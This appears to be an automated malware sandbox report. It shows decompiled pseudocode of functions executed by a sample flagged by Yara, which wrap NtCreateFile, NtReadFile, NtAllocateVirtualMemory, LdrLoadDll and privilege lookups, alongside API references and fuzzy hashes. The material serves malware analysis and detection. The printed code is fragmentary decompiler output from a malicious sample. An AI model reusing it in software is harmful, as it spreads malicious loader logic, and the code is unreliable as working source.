                                                                                    Similarity
                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 190613189-0
                                                                                    • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                                    • Instruction ID: 0c44f0240925c5b75b39479a83fd13515cb2c3d3321eb5bdfbc953cb3faf5d46
                                                                                    • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                                    • Instruction Fuzzy Hash: FBF0F631105A18FFDB12DFA4CD00D9EBBA8EF55350B2540B9E840F7210D634DE01AFA8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Executed Functions

                                                                                    C-Code - Quality: 37%
                                                                                    			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                    				void* _t18;
                                                                                    				void* _t27;
                                                                                    				intOrPtr* _t28;
                                                                                    
                                                                                    				_t13 = _a4;
                                                                                    				_t28 = _a4 + 0xc48;
                                                                                    				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                                    				_t6 =  &_a32; // 0x413d52
                                                                                    				_t12 =  &_a8; // 0x413d52
                                                                                    				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                                                    				return _t18;
                                                                                    			}







                                                                                    APIs
                                                                                    • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID: R=A$R=A
                                                                                    • API String ID: 2738559852-3742021989
                                                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                    • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                    • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 37%
                                                                                    			E0041826C(signed int __eax, void* __edi, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                    				void* _t21;
                                                                                    				void* _t32;
                                                                                    				intOrPtr* _t33;
                                                                                    				void* _t35;
                                                                                    
                                                                                    				_t31 = __edi +  *((intOrPtr*)(__eax * 2 - 0x1374aac1));
                                                                                    				_t16 = _a4;
                                                                                    				_t33 = _a4 + 0xc48;
                                                                                    				E00418DC0(_t31, _t16, _t33,  *((intOrPtr*)(_t16 + 0x10)), 0, 0x2a);
                                                                                    				_t8 =  &_a32; // 0x413d52
                                                                                    				_t14 =  &_a8; // 0x413d52
                                                                                    				_t21 =  *((intOrPtr*)( *_t33))( *_t14, _a12, _a16, _a20, _a24, _a28,  *_t8, _a36, _a40, _t32, _t35); // executed
                                                                                    				return _t21;
                                                                                    			}








                                                                                    APIs
                                                                                    • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID: R=A$R=A
                                                                                    • API String ID: 2738559852-3742021989
                                                                                    • Opcode ID: 7a544b5e9beb00c7abb48c378330707728f83c1694479f4e5a983f87595beab2
                                                                                    • Instruction ID: 06aea5ea9b62c8f08385dfefd69c4e159e0f69636af22cb6cae9cca6d72240a1
                                                                                    • Opcode Fuzzy Hash: 7a544b5e9beb00c7abb48c378330707728f83c1694479f4e5a983f87595beab2
                                                                                    • Instruction Fuzzy Hash: E9F0BDB6200104AFCB14DF89DC80DEB77A9FF8C354F158649FA1D97251DA34E951CBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00409B20(void* _a4, intOrPtr _a8) {
                                                                                    				char* _v8;
                                                                                    				struct _EXCEPTION_RECORD _v12;
                                                                                    				struct _OBJDIR_INFORMATION _v16;
                                                                                    				char _v536;
                                                                                    				void* _t15;
                                                                                    				struct _OBJDIR_INFORMATION _t17;
                                                                                    				struct _OBJDIR_INFORMATION _t18;
                                                                                    				void* _t30;
                                                                                    				void* _t31;
                                                                                    				void* _t32;
                                                                                    
                                                                                    				_v8 =  &_v536;
                                                                                    				_t15 = E0041AB50( &_v12, 0x104, _a8);
                                                                                    				_t31 = _t30 + 0xc;
                                                                                    				if(_t15 != 0) {
                                                                                    					_t17 = E0041AF70(__eflags, _v8);
                                                                                    					_t32 = _t31 + 4;
                                                                                    					__eflags = _t17;
                                                                                    					if(_t17 != 0) {
                                                                                    						E0041B1F0( &_v12, 0);
                                                                                    						_t32 = _t32 + 8;
                                                                                    					}
                                                                                    					_t18 = E00419300(_v8);
                                                                                    					_v16 = _t18;
                                                                                    					__eflags = _t18;
                                                                                    					if(_t18 == 0) {
                                                                                    						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                                    						return _v16;
                                                                                    					}
                                                                                    					return _t18;
                                                                                    				} else {
                                                                                    					return _t15;
                                                                                    				}
                                                                                    			}














                                                                                    APIs
                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Load
                                                                                    • String ID:
                                                                                    • API String ID: 2234796835-0
                                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                    • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                    • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 44%
                                                                                    			E004181BA(intOrPtr _a8, HANDLE* _a12, long _a16, struct _EXCEPTION_RECORD _a20, struct _ERESOURCE_LITE _a24, struct _GUID _a28, long _a32, long _a36, long _a40, long _a44, void* _a48, long _a52) {
                                                                                    				long _t21;
                                                                                    				void* _t32;
                                                                                    
                                                                                    				asm("int1");
                                                                                    				asm("das");
                                                                                    				asm("aad 0x5a");
                                                                                    				asm("sbb edx, [ebp-0x75]");
                                                                                    				_t15 = _a8;
                                                                                    				_t3 = _t15 + 0xc40; // 0xc40
                                                                                    				E00418DC0(_t32, _a8, _t3,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x28);
                                                                                    				_t21 = NtCreateFile(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
                                                                                    				return _t21;
                                                                                    			}





                                                                                    APIs
                                                                                    • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004181C0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                    				long _t21;
                                                                                    				void* _t31;
                                                                                    
                                                                                    				_t3 = _a4 + 0xc40; // 0xc40
                                                                                    				E00418DC0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                    				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                    				return _t21;
                                                                                    			}





                                                                                    APIs
                                                                                    • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 50%
                                                                                    			E004182EA(void* __eax, void* __ebx, char _a1, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20) {
                                                                                    				void* _t9;
                                                                                    				char* _t29;
                                                                                    
                                                                                    				_t9 = __eax - 0xf5;
                                                                                    				asm("popfd");
                                                                                    				_t29 =  &_a1;
                                                                                    				if (_t29 < 0) goto L3;
                                                                                    				_push(_t29);
                                                                                    			}





                                                                                    APIs
                                                                                    • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID:
                                                                                    • API String ID: 3535843008-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                    				long _t14;
                                                                                    				void* _t21;
                                                                                    
                                                                                    				_t3 = _a4 + 0xc60; // 0xca0
                                                                                    				E00418DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                                    				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                    				return _t14;
                                                                                    			}





                                                                                    APIs
                                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateMemoryVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2167126740-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID:
                                                                                    • API String ID: 3535843008-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 0fd9178f70a7e71ebd60122c508530301637174e453e49a8a47c0c2c4e299b92
                                                                                    • Instruction ID: 01e38f4eb81fcfc3b52da05435d651a2bf1f17559722dc06c1b3839cd6de977f
                                                                                    • Opcode Fuzzy Hash: 0fd9178f70a7e71ebd60122c508530301637174e453e49a8a47c0c2c4e299b92
                                                                                    • Instruction Fuzzy Hash: 4390027170100813D311616A4504707001997D03C1F91C422A0414558D9A968952F161
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 76474d9bfab59294fd345966eec180c452a464347f18b5f5857acdd24d0f8e4b
                                                                                    • Instruction ID: 477be5eacac807b1c07b371308cb66ba469d016b1b3fba5179a1500f9858a7c3
                                                                                    • Opcode Fuzzy Hash: 76474d9bfab59294fd345966eec180c452a464347f18b5f5857acdd24d0f8e4b
                                                                                    • Instruction Fuzzy Hash: 58900261742045529745B16A44045074016A7E03C1791C022A1404950C89669856E661
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: c00a2ce4298465445edb11e9c75c85e19878800e0dbb6b9d4f21566e1803aea2
                                                                                    • Instruction ID: 1fbeb9f4a196265c319d83f7f7a73e095c4030bce710e7cf97b14c271c05598e
                                                                                    • Opcode Fuzzy Hash: c00a2ce4298465445edb11e9c75c85e19878800e0dbb6b9d4f21566e1803aea2
                                                                                    • Instruction Fuzzy Hash: 229002A174100842D300616A4414B060015D7E1381F51C025E1054554D8A59CC52B166
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: fbfb9f5feffeaa7b535b183bf9533fa37e7865cb3050d168e73e5a9c89fe1301
                                                                                    • Instruction ID: 97a5fda23c1b24338368ea9b93c6915b1a90db8d41c29f0a2ca1da82ad4ff69c
                                                                                    • Opcode Fuzzy Hash: fbfb9f5feffeaa7b535b183bf9533fa37e7865cb3050d168e73e5a9c89fe1301
                                                                                    • Instruction Fuzzy Hash: 279002A1702004038305716A4414616401A97E0381B51C031E1004590DC9658891B165
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 936d5bd431cf65b5440d1e8f2c05715cab3582f30257bc2d7c5389eb7797b1f1
                                                                                    • Instruction ID: 5051a8728ddcd3ddaff522636ca02e390124de473acfd13d3dc867be3d27cc7d
                                                                                    • Opcode Fuzzy Hash: 936d5bd431cf65b5440d1e8f2c05715cab3582f30257bc2d7c5389eb7797b1f1
                                                                                    • Instruction Fuzzy Hash: DD9002B170100802D340716A4404746001597D0381F51C021A5054554E8A998DD5B6A5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 9fce2cec09b9c17aa8ba3fee7f6746af26cbcdbd32e5d25265f79c6b781eed8d
                                                                                    • Instruction ID: 3c2fbcffac64722869632978d3dd2c1f220107397aff334f17e908825ffe6250
                                                                                    • Opcode Fuzzy Hash: 9fce2cec09b9c17aa8ba3fee7f6746af26cbcdbd32e5d25265f79c6b781eed8d
                                                                                    • Instruction Fuzzy Hash: C9900265711004034305A56A0704507005697D53D1351C031F1005550CDA618861A161
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 85c60e06488a2dbb414fb88158553794bea4ed22ea3219c4e98284aa01e2d55b
                                                                                    • Instruction ID: acee84d3fe0d625309e564dda8a708dcdfa0cdb1c4c0dc461eeb2c6f632d8efd
                                                                                    • Opcode Fuzzy Hash: 85c60e06488a2dbb414fb88158553794bea4ed22ea3219c4e98284aa01e2d55b
                                                                                    • Instruction Fuzzy Hash: C490027170108C02D310616A840474A001597D0381F55C421A4414658D8AD58891B161
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 82%
                                                                                    			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
                                                                                    				char _v67;
                                                                                    				char _v68;
                                                                                    				void* _t12;
                                                                                    				intOrPtr* _t13;
                                                                                    				int _t14;
                                                                                    				long _t21;
                                                                                    				intOrPtr* _t25;
                                                                                    				void* _t26;
                                                                                    				void* _t30;
                                                                                    
                                                                                    				_t30 = __eflags;
                                                                                    				_v68 = 0;
                                                                                    				L00419D20( &_v67, 0, 0x3f);
                                                                                    				E0041A900( &_v68, 3);
                                                                                    				_t12 = E00409B20(_t30, _a4 + 0x1c,  &_v68); // executed
                                                                                    				_t13 = L00413E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                                                    				_t25 = _t13;
                                                                                    				if(_t25 != 0) {
                                                                                    					_t21 = _a8;
                                                                                    					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                                                    					_t32 = _t14;
                                                                                    					if(_t14 == 0) {
                                                                                    						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409280(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                                    					}
                                                                                    					return _t14;
                                                                                    				}
                                                                                    				return _t13;
                                                                                    			}













                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID:
                                                                                    • API String ID: 1836367815-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 53%
                                                                                    			E004184C3(void* __edx, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                    				void* _v117;
                                                                                    				char _t12;
                                                                                    				void* _t19;
                                                                                    
                                                                                    				asm("aas");
                                                                                    				asm("repne aad 0xa9");
                                                                                    				asm("in eax, dx");
                                                                                    				_t9 = _a4;
                                                                                    				_t5 = _t9 + 0xc74; // 0xc74
                                                                                    				E00418DC0(_t19, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                                    				_t12 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                    				return _t12;
                                                                                    			}







                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3298025750-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004184D0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                    				char _t10;
                                                                                    				void* _t15;
                                                                                    
                                                                                    				_t3 = _a4 + 0xc74; // 0xc74
                                                                                    				L00418DC0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                                    				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                    				return _t10;
                                                                                    			}






                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3298025750-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                                                    				void* _t10;
                                                                                    				void* _t15;
                                                                                    
                                                                                    				L00418DC0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                                    				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                                                    				return _t10;
                                                                                    			}






                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00418630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                    				int _t10;
                                                                                    				void* _t15;
                                                                                    
                                                                                    				L00418DC0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                                                    				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                    				return _t10;
                                                                                    			}





                                                                                    0x0041864a
                                                                                    0x00418660
                                                                                    0x00418664

                                                                                    APIs
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LookupPrivilegeValue
                                                                                    • String ID:
                                                                                    • API String ID: 3899507212-0
                                                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                    • Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
                                                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                    • Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00418510(intOrPtr _a4, int _a8) {
                                                                                    				void* _t10;
                                                                                    
                                                                                    				_t5 = _a4;
                                                                                    				L00418DC0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                                    				ExitProcess(_a8);
                                                                                    			}




                                                                                    0x00418513
                                                                                    0x0041852a
                                                                                    0x00418538

                                                                                    APIs
                                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExitProcess
                                                                                    • String ID:
                                                                                    • API String ID: 621844428-0
                                                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                    • Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
                                                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                    • Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
